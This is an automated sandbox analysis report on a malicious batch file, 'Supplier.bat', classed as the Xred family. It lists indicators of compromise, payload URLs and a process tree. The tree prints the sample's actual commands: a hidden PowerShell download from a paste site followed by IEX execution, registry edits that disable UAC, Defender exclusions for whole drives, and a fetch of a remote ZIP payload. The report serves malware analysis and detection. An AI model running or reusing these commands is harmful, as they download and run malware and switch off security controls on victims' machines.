Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
Supplier.bat
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Supplier.bat
Resource
win10v2004-20241007-en
General
-
Target
Supplier.bat
-
Size
41KB
-
MD5
b84568e632497dd5dc2f4ac9f08b783c
-
SHA1
a0a8e9493a356a2c495130da52c5b49c3d82685a
-
SHA256
b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
-
SHA512
e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
-
SSDEEP
96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0
Malware Config
Extracted
https://paste.fo/raw/cdfd23f3b9ad
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Xred family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 3596 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3596 powershell.exe 3364 powershell.exe 4948 powershell.exe 3752 powershell.exe 1900 powershell.exe 3364 powershell.exe 2164 powershell.exe 5028 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation DOCX.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Synaptics.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk ._cache_DOCX.exe -
Executes dropped EXE 6 IoCs
pid Process 2152 DOCX.exe 1144 ._cache_DOCX.exe 4428 Synaptics.exe 1840 ._cache_Synaptics.exe 3124 XVZBZS.exe 2532 XVZBZS.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGWEKK = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\XVZBZS.exe\"" ._cache_DOCX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" DOCX.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 raw.githubusercontent.com 20 raw.githubusercontent.com -
AutoIT Executable 14 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/1840-377-0x0000000000F00000-0x00000000010FA000-memory.dmp autoit_exe behavioral2/memory/1144-427-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-428-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/3124-436-0x0000000000A10000-0x0000000000C0A000-memory.dmp autoit_exe behavioral2/memory/1144-437-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-439-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-441-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-443-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-445-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/2532-473-0x0000000000A10000-0x0000000000C0A000-memory.dmp autoit_exe behavioral2/memory/1144-474-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-476-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-478-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe behavioral2/memory/1144-480-0x0000000000DF0000-0x0000000000FEA000-memory.dmp autoit_exe -
resource yara_rule behavioral2/files/0x0007000000023cdb-180.dat upx behavioral2/memory/1144-235-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1840-370-0x0000000000F00000-0x00000000010FA000-memory.dmp upx behavioral2/memory/1840-377-0x0000000000F00000-0x00000000010FA000-memory.dmp upx behavioral2/memory/1144-427-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-428-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/3124-434-0x0000000000A10000-0x0000000000C0A000-memory.dmp upx behavioral2/memory/3124-436-0x0000000000A10000-0x0000000000C0A000-memory.dmp upx behavioral2/memory/1144-437-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-439-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-441-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-443-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-445-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/2532-473-0x0000000000A10000-0x0000000000C0A000-memory.dmp upx behavioral2/memory/1144-474-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-476-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-478-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx behavioral2/memory/1144-480-0x0000000000DF0000-0x0000000000FEA000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_DOCX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSCript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XVZBZS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XVZBZS.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 4916 timeout.exe 3760 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 12 IoCs
pid Process 2896 taskkill.exe 4448 taskkill.exe 2656 taskkill.exe 1740 taskkill.exe 3272 taskkill.exe 2760 taskkill.exe 4448 taskkill.exe 1812 taskkill.exe 976 taskkill.exe 4032 taskkill.exe 3284 taskkill.exe 4092 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ DOCX.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 4764 reg.exe 4796 reg.exe 3720 reg.exe 3560 reg.exe 2176 reg.exe 840 reg.exe 1392 reg.exe 1496 reg.exe 2896 reg.exe 1396 reg.exe 2524 reg.exe 2220 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\SecurityCenter2 ._cache_DOCX.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 976 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3868 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3596 powershell.exe 3596 powershell.exe 5028 powershell.exe 5028 powershell.exe 3364 powershell.exe 3364 powershell.exe 4948 powershell.exe 4948 powershell.exe 1736 msedge.exe 1736 msedge.exe 324 msedge.exe 324 msedge.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 1900 powershell.exe 1900 powershell.exe 1900 powershell.exe 3364 powershell.exe 3364 powershell.exe 3364 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 448 identity_helper.exe 448 identity_helper.exe 4360 msedge.exe 4360 msedge.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe 1144 ._cache_DOCX.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1144 ._cache_DOCX.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 3364 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 3752 powershell.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 3364 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeRestorePrivilege 392 7z.exe Token: 35 392 7z.exe Token: SeSecurityPrivilege 392 7z.exe Token: SeSecurityPrivilege 392 7z.exe Token: SeDebugPrivilege 2896 taskkill.exe Token: SeDebugPrivilege 4448 taskkill.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 976 taskkill.exe Token: SeDebugPrivilege 2656 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 3272 taskkill.exe Token: SeDebugPrivilege 4032 taskkill.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 3284 taskkill.exe Token: SeDebugPrivilege 4092 taskkill.exe Token: SeDebugPrivilege 4448 taskkill.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
pid Process 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe 324 msedge.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3868 EXCEL.EXE 3868 EXCEL.EXE 3868 EXCEL.EXE 3868 EXCEL.EXE 3868 EXCEL.EXE 3868 EXCEL.EXE 3868 EXCEL.EXE 3868 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2016 wrote to memory of 3032 2016 cmd.exe 84 PID 2016 wrote to memory of 3032 2016 cmd.exe 84 PID 3032 wrote to memory of 3596 3032 cmd.exe 86 PID 3032 wrote to memory of 3596 3032 cmd.exe 86 PID 3032 wrote to memory of 5028 3032 cmd.exe 87 PID 3032 wrote to memory of 5028 3032 cmd.exe 87 PID 5028 wrote to memory of 1944 5028 powershell.exe 88 PID 5028 wrote to memory of 1944 5028 powershell.exe 88 PID 1944 wrote to memory of 2896 1944 cmd.exe 90 PID 1944 wrote to memory of 2896 1944 cmd.exe 90 PID 1944 wrote to memory of 3560 1944 cmd.exe 91 PID 1944 wrote to memory of 3560 1944 cmd.exe 91 PID 1944 wrote to memory of 2176 1944 cmd.exe 92 PID 1944 wrote to memory of 2176 1944 cmd.exe 92 PID 1944 wrote to memory of 840 1944 cmd.exe 120 PID 1944 wrote to memory of 840 1944 cmd.exe 120 PID 1944 wrote to memory of 1396 1944 cmd.exe 94 PID 1944 wrote to memory of 1396 1944 cmd.exe 94 PID 1944 wrote to memory of 1392 1944 cmd.exe 95 PID 1944 wrote to memory of 1392 1944 cmd.exe 95 PID 1944 wrote to memory of 3720 1944 cmd.exe 96 PID 1944 wrote to memory of 3720 1944 cmd.exe 96 PID 1944 wrote to memory of 4796 1944 cmd.exe 97 PID 1944 wrote to memory of 4796 1944 cmd.exe 97 PID 1944 wrote to memory of 4764 1944 cmd.exe 98 PID 1944 wrote to memory of 4764 1944 cmd.exe 98 PID 1944 wrote to memory of 1496 1944 cmd.exe 99 PID 1944 wrote to memory of 1496 1944 cmd.exe 99 PID 1944 wrote to memory of 2220 1944 cmd.exe 100 PID 1944 wrote to memory of 2220 1944 cmd.exe 100 PID 1944 wrote to memory of 2524 1944 cmd.exe 101 PID 1944 wrote to memory of 2524 1944 cmd.exe 101 PID 1944 wrote to memory of 3364 1944 cmd.exe 124 PID 1944 wrote to memory of 3364 1944 cmd.exe 124 PID 3032 wrote to memory of 324 3032 cmd.exe 103 PID 3032 wrote to memory of 324 3032 cmd.exe 103 PID 324 wrote to memory of 1416 324 msedge.exe 105 PID 324 wrote to memory of 1416 324 msedge.exe 105 PID 3032 wrote to memory of 4916 3032 cmd.exe 106 PID 3032 wrote to memory of 4916 3032 cmd.exe 106 PID 1944 wrote to memory of 4948 1944 cmd.exe 107 PID 1944 wrote to memory of 4948 1944 cmd.exe 107 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108 PID 324 wrote to memory of 1920 324 msedge.exe 108
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Supplier.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2896
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:3560
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2176
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:840
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1396
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1392
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3720
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4796
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4764
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1496
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2220
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff171946f8,0x7fff17194708,0x7fff171947184⤵PID:1416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:24⤵PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:84⤵PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:14⤵PID:1252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:14⤵PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:14⤵PID:2468
-
-
